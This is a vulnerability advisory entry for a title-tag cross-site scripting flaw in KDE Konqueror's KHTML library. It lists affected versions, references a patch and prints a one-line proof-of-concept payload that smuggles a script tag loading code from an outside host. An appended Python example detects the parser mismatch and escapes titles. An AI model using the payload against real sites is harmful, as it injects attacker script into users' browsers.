seebug | Root | SSV:1398
Feb 11, 2007 - 12:00 a.m.

KDE Konqueror KHTML Library Title Cross-Site Scripting Vulnerability


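Konqueror is a multi-purpose browser that can browse local and network file systems and is also a full-featured WWW browser.
Konqueror has an input validation problem in the way it handles title tags on web sites. A remote attacker can exploit the vulnerability to carry out cross-site scripting attacks and obtain sensitive information belonging to the target user.
If a <title> tag is constructed that contains malicious script code, the script code can be executed when Konqueror processes the tag, which can disclose the target user's sensitive information.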

Ubuntu Ubuntu Linux 5.10 sparc
Ubuntu Ubuntu Linux 5.10 powerpc
Ubuntu Ubuntu Linux 5.10 i386
Ubuntu Ubuntu Linux 5.10 amd64
Ubuntu Ubuntu Linux 6.10 sparc
Ubuntu Ubuntu Linux 6.10 powerpc
Ubuntu Ubuntu Linux 6.10 i386
Ubuntu Ubuntu Linux 6.10 amd64
Ubuntu Ubuntu Linux 6.06 LTS sparc
Ubuntu Ubuntu Linux 6.06 LTS powerpc
Ubuntu Ubuntu Linux 6.06 LTS i386
Ubuntu Ubuntu Linux 6.06 LTS amd64
MandrakeSoft Linux Mandrake 2007.0 x86_64
MandrakeSoft Linux Mandrake 2007.0
MandrakeSoft Corporate Server 4.0 x86_64
MandrakeSoft Corporate Server 3.0 x86_64
MandrakeSoft Corporate Server 3.0
MandrakeSoft Corporate Server 4.0
KDE Libkhtml 4.2
KDE Konqueror 3.5.2
KDE Konqueror 3.5.1
KDE Konqueror 3.3.2
KDE Konqueror 3.3.1
KDE Konqueror 3.3
KDE Konqueror 3.2.3
KDE Konqueror 3.2.2 -6
KDE Konqueror 3.2.1
KDE Konqueror 3.1.5
KDE Konqueror 3.1.4
KDE Konqueror 3.1.3
KDE Konqueror 3.1.2
KDE Konqueror 3.1.1

  • KDE KDE 3.1.1
    KDE Konqueror 3.1
    KDE Konqueror 3.0.5 b
    KDE Konqueror 3.0.5
    KDE Konqueror 3.0.3
  • KDE KDE 3.0.3
    KDE Konqueror 3.0.2
    KDE Konqueror 3.0.1
  • KDE KDE 3.0.1
    KDE Konqueror 3.0
  • KDE KDE 3.0
    KDE Konqueror 2.2.2
  • Debian Linux 3.0 sparc
  • Debian Linux 3.0 s/390
  • Debian Linux 3.0 ppc
  • Debian Linux 3.0 mipsel
  • Debian Linux 3.0 mips
  • Debian Linux 3.0 m68k
  • Debian Linux 3.0 ia-64
  • Debian Linux 3.0 ia-32
  • Debian Linux 3.0 hppa
  • Debian Linux 3.0 arm
  • Debian Linux 3.0 alpha
  • Debian Linux 3.0
  • RedHat Enterprise Linux WS 2.1 IA64
  • RedHat Enterprise Linux WS 2.1
  • RedHat Enterprise Linux ES 2.1 IA64
  • RedHat Enterprise Linux ES 2.1
  • RedHat Enterprise Linux AS 2.1 IA64
  • RedHat Enterprise Linux AS 2.1
  • RedHat Linux Advanced Work Station 2.1
  • Turbolinux Turbolinux Server 8.0
  • Turbolinux Turbolinux Server 7.0
  • Turbolinux Turbolinux Workstation 8.0
  • Turbolinux Turbolinux Workstation 7.0
    KDE Konqueror 2.2.1
    KDE Konqueror 2.1.2
    KDE Konqueror 2.1.1
    KDE kdelibs 3.5.4
  • Gentoo Linux
    KDE kdelibs 3.5.2
  • Gentoo Linux
    KDE kdelibs 3.4.3
    KDE kdelibs 3.4
  • Gentoo Linux
    KDE kdelibs 3.3.2
  • Gentoo Linux
    KDE kdelibs 3.3.1
  • RedHat Desktop 4.0
  • RedHat Enterprise Linux WS 4
  • RedHat Enterprise Linux ES 4
  • RedHat Enterprise Linux Desktop version 4
  • RedHat Enterprise Linux AS 4
    KDE kdelibs 3.3
    KDE kdelibs 3.2.2
    KDE kdelibs 3.2.1
    KDE kdelibs 3.2
    KDE kdelibs 3.1.5
  • KDE KDE 3.1.5
    KDE kdelibs 3.1.4
  • KDE KDE 3.1.4
    KDE kdelibs 3.1.3
  • KDE KDE 3.1.3
  • MandrakeSoft Linux Mandrake 9.2 amd64
  • MandrakeSoft Linux Mandrake 9.2
    KDE kdelibs 3.1.2
    KDE kdelibs 3.1.1
  • KDE KDE 3.1.1
    KDE kdelibs 3.1
  • KDE KDE 3.1
    KDE kdelibs 3.0
  • KDE KDE 3.1
    KDE kdelibs 2.1.2
    KDE kdelibs 2.1.1
  • KDE KDE 2.1.1
    KDE kdelibs 2.1
  • KDE KDE 2.1
    KDE kdelibs 2.0.1
    KDE kdelibs 2.0
    KDE KDE 3.5.6
    KDE KDE 3.5.5
    KDE KDE 3.5.4
    KDE KDE 3.5.3
    KDE KDE 3.5.2
    KDE KDE 3.5.1
    KDE KDE 3.5
    KDE KDE 3.4.3
    KDE KDE 3.4.2
    KDE KDE 3.4.1
    KDE KDE 3.4
    KDE KDE 3.4
    KDE KDE 3.3.2
    KDE KDE 3.3.2
    KDE KDE 3.3.1
  • RedHat Fedora Core3
    KDE KDE 3.3
    KDE KDE 3.2.3
    KDE KDE 3.2.2
    KDE KDE 3.2.1
    KDE KDE 3.2
    KDE KDE 3.1.5
    KDE KDE 3.1.4
    KDE KDE 3.1.3
    KDE KDE 3.1.2
  • Conectiva Linux 9.0
  • KDE KDE 3.1.2
    KDE KDE 3.1.1 a
    KDE KDE 3.1.1
    KDE KDE 3.1
  • RedHat Linux 9.0 i386
  • S.u.S.E. Linux 8.1
    KDE KDE 3.0.5 b
    KDE KDE 3.0.5 a
  • RedHat Linux 8.0 i386
  • RedHat Linux 7.3 i386
    KDE KDE 3.0.5
  • Conectiva Linux 8.0
    KDE KDE 3.0.4
  • Gentoo Linux 1.4 _rc1
  • Gentoo Linux 1.2
    KDE KDE 3.0.3 a
    KDE KDE 3.0.3
  • Conectiva Linux 8.0
  • Conectiva Linux Enterprise Edition 1.0
  • FreeBSD FreeBSD 4.7 -STABLE
  • MandrakeSoft Linux Mandrake 9.0
    KDE KDE 3.0.2
  • MandrakeSoft Linux Mandrake 8.2
    KDE KDE 3.0.1
    KDE KDE 3.0
  • Conectiva Linux 8.0
    KDE KDE 2.2.2
  • Debian Linux 3.0 sparc
  • Debian Linux 3.0 s/390
  • Debian Linux 3.0 ppc
  • Debian Linux 3.0 mipsel
  • Debian Linux 3.0 mips
  • Debian Linux 3.0 m68k
  • Debian Linux 3.0 ia-64
  • Debian Linux 3.0 ia-32
  • Debian Linux 3.0 hppa
  • Debian Linux 3.0 arm
  • Debian Linux 3.0 alpha
  • Debian Linux 3.0
  • MandrakeSoft Linux Mandrake 8.2 ppc
  • MandrakeSoft Linux Mandrake 8.2
  • MandrakeSoft Linux Mandrake 8.1 ia64
  • MandrakeSoft Linux Mandrake 8.1
  • RedHat Advanced Workstation for the Itanium Processor 2.1
  • RedHat Enterprise Linux WS 2.1 IA64
  • RedHat Enterprise Linux WS 2.1
  • RedHat Enterprise Linux ES 2.1 IA64
  • RedHat Enterprise Linux ES 2.1
  • RedHat Enterprise Linux AS 2.1 IA64
  • RedHat Enterprise Linux AS 2.1
  • RedHat Linux 7.2 ia64
  • RedHat Linux 7.2 i386
  • RedHat Linux 7.1 i386
  • Sun Linux 5.0.7
  • Sun Linux 5.0.6
  • Sun Linux 5.0.5
    KDE KDE 2.2.1
    KDE KDE 2.2
    KDE KDE 2.1.2
    KDE KDE 2.1.1
    KDE KDE 2.1
    KDE KDE 2.0.1
  • Conectiva Linux 6.0
    KDE KDE 2.0 BETA
    KDE KDE 2.0
    KDE KDE 1.2
    KDE KDE 1.1.2
  • Caldera OpenLinux 2.3
  • MandrakeSoft Linux Mandrake 7.0
    KDE KDE 1.1.1
    KDE KDE 1.1
    Apple Safari RSS 2.0 pre-release
    Apple Safari 2.0.4
    Apple Safari 2.0.3
    Apple Safari 2.0.2
    Apple Safari 2.0.1
  • Apple Mac OS X 10.4.2
  • Apple Mac OS X 10.4.1
  • Apple Mac OS X 10.4
  • Apple Mac OS X Server 10.4.2
  • Apple Mac OS X Server 10.4.1
  • Apple Mac OS X Server 10.4
    Apple Safari 2.0
  • Apple Mac OS X 10.4.2
  • Apple Mac OS X 10.4.1
  • Apple Mac OS X 10.4
  • Apple Mac OS X Server 10.4.2
  • Apple Mac OS X Server 10.4.1
  • Apple Mac OS X Server 10.4
    Apple Safari 1.3.1
    Apple Safari 1.3
  • Apple Mac OS X 10.3.9
    Apple Safari 1.2.3
    Apple Safari 1.2.2
    Apple Safari 1.2.1
    Apple Safari 1.2
  • Apple Mac OS X 10.3.7
  • Apple Mac OS X 10.3.7
  • Apple Mac OS X 10.3.6
  • Apple Mac OS X 10.3.6
  • Apple Mac OS X 10.3.5
  • Apple Mac OS X 10.3.5
  • Apple Mac OS X 10.3.4
  • Apple Mac OS X 10.3.4
  • Apple Mac OS X 10.3.3
  • Apple Mac OS X 10.3.3
  • Apple Mac OS X 10.3.2
  • Apple Mac OS X 10.3.2
  • Apple Mac OS X 10.3.1
  • Apple Mac OS X 10.3.1
  • Apple Mac OS X 10.3
  • Apple Mac OS X 10.3
  • Apple Mac OS X 10.2.8
  • Apple Mac OS X 10.2.8
  • Apple Mac OS X 10.2.7
  • Apple Mac OS X 10.2.7
  • Apple Mac OS X 10.2.6
  • Apple Mac OS X 10.2.6
  • Apple Mac OS X 10.2.5
  • Apple Mac OS X 10.2.5
  • Apple Mac OS X 10.2.4
  • Apple Mac OS X 10.2.4
  • Apple Mac OS X 10.2.3
  • Apple Mac OS X 10.2.3
  • Apple Mac OS X 10.2.2
  • Apple Mac OS X 10.2.2
  • Apple Mac OS X 10.2.1
  • Apple Mac OS X 10.2.1
  • Apple Mac OS X 10.2
  • Apple Mac OS X 10.2
  • Apple Mac OS X Server 10.3.7
  • Apple Mac OS X Server 10.3.6
  • Apple Mac OS X Server 10.3.6
  • Apple Mac OS X Server 10.3.5
  • Apple Mac OS X Server 10.3.5
  • Apple Mac OS X Server 10.3.4
  • Apple Mac OS X Server 10.3.4
  • Apple Mac OS X Server 10.3.3
  • Apple Mac OS X Server 10.3.3
  • Apple Mac OS X Server 10.3.2
  • Apple Mac OS X Server 10.3.2
  • Apple Mac OS X Server 10.3.1
  • Apple Mac OS X Server 10.3.1
  • Apple Mac OS X Server 10.3
  • Apple Mac OS X Server 10.3
  • Apple Mac OS X Server 10.2.8
  • Apple Mac OS X Server 10.2.8
  • Apple Mac OS X Server 10.2.7
  • Apple Mac OS X Server 10.2.7
  • Apple Mac OS X Server 10.2.6
  • Apple Mac OS X Server 10.2.6
  • Apple Mac OS X Server 10.2.5
  • Apple Mac OS X Server 10.2.5
  • Apple Mac OS X Server 10.2.4
  • Apple Mac OS X Server 10.2.4
  • Apple Mac OS X Server 10.2.3
  • Apple Mac OS X Server 10.2.3
  • Apple Mac OS X Server 10.2.2
  • Apple Mac OS X Server 10.2.2
  • Apple Mac OS X Server 10.2.1
  • Apple Mac OS X Server 10.2.1
  • Apple Mac OS X Server 10.2
  • Apple Mac OS X Server 10.2
    Apple Safari 1.1
    Apple Safari 1.0
  • Apple Mac OS X 10.2.8
  • Apple Mac OS X 10.2.8
  • Apple Mac OS X 10.2.7
  • Apple Mac OS X 10.2.7
  • Apple Mac OS X 10.2.6
  • Apple Mac OS X 10.2.6
  • Apple Mac OS X 10.2.5
  • Apple Mac OS X 10.2.5
  • Apple Mac OS X 10.2.4
  • Apple Mac OS X 10.2.4
  • Apple Mac OS X 10.2.3
  • Apple Mac OS X 10.2.3
  • Apple Mac OS X 10.2.2
  • Apple Mac OS X 10.2.2
  • Apple Mac OS X 10.2.1
  • Apple Mac OS X 10.2.1
  • Apple Mac OS X 10.2
  • Apple Mac OS X 10.2
  • Apple Mac OS X Server 10.2.8
  • Apple Mac OS X Server 10.2.7
  • Apple Mac OS X Server 10.2.7
  • Apple Mac OS X Server 10.2.6
  • Apple Mac OS X Server 10.2.6
  • Apple Mac OS X Server 10.2.5
  • Apple Mac OS X Server 10.2.5
  • Apple Mac OS X Server 10.2.4
  • Apple Mac OS X Server 10.2.4
  • Apple Mac OS X Server 10.2.3
  • Apple Mac OS X Server 10.2.3
  • Apple Mac OS X Server 10.2.2
  • Apple Mac OS X Server 10.2.2
  • Apple Mac OS X Server 10.2.1
  • Apple Mac OS X Server 10.2.1
  • Apple Mac OS X Server 10.2
  • Apple Mac OS X Server 10.2
    Apple Safari Beta 2

Refer to the following patch:
ftp://ftp.kde.org/pub/kde/security_patches :
edc2cba17795356e98eba6f3841c6277 post-3.5.6-kdelibs.diff


<title>myblog<!--</title></head><body><script src=http://beanfuzz.com/bean.js> --></title>
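
Added example (not part of the original advisory or of the KDE patch): the proof of concept above places a comment opener inside `<title>`, so a parser that reads title text as RCDATA and a filter that strips comments first see two different documents. The Python below flags that disagreement and shows output escaping for user-supplied titles; the function names and the sample, with its example.invalid URL, are constructed for illustration.

```python
import html
import re

# RCDATA rule (HTML Living Standard): <title> text runs to the first
# "</title" followed by whitespace, "/" or ">"; "<!--" inside it is plain text.
TITLE_OPEN = re.compile(r"<title\b[^>]*>", re.I)
TITLE_CLOSE = re.compile(r"</title(?=[\s/>])", re.I)
COMMENT = re.compile(r"<!--.*?-->", re.S)


def title_text(doc):
    """Return the raw text of the first <title>, or None if there is none."""
    start = TITLE_OPEN.search(doc)
    if not start:
        return None
    end = TITLE_CLOSE.search(doc, start.end())
    return doc[start.end():end.start()] if end else doc[start.end():]


def audit_title(doc):
    """Compare the RCDATA view of <title> with a comment-stripping view."""
    rcdata = title_text(doc)
    stripped = title_text(COMMENT.sub("", doc))
    findings = []
    if rcdata is not None and "<!--" in rcdata:
        findings.append("comment opener inside <title>")
    if rcdata != stripped:
        findings.append("title differs between parser models")
    if rcdata is not None and re.search(r"<\s*/?\s*[a-z]", rcdata, re.I):
        findings.append("unescaped tag markup inside <title>")
    return {"rcdata": rcdata, "comment_stripped": stripped, "findings": findings}


def render_title(user_text):
    """Hardened output: escape &, < and > before placing text in <title>."""
    return "<title>" + html.escape(user_text, quote=False) + "</title>"


# Constructed sample with the same shape as the proof of concept above;
# the script URL is a placeholder, not a value from the advisory.
SAMPLE = (
    "<html><head><title>myblog<!--</title></head><body>"
    "<script src=https://example.invalid/x.js> --></title>"
    "</head><body>hi</body></html>"
)

if __name__ == "__main__":
    print(audit_title(SAMPLE))
    print(audit_title(render_title("myblog<!--")))
```

A page that passes the audit still needs the vendor patch on affected clients; the check only shows where a server-side filter and a browser can disagree about the same markup.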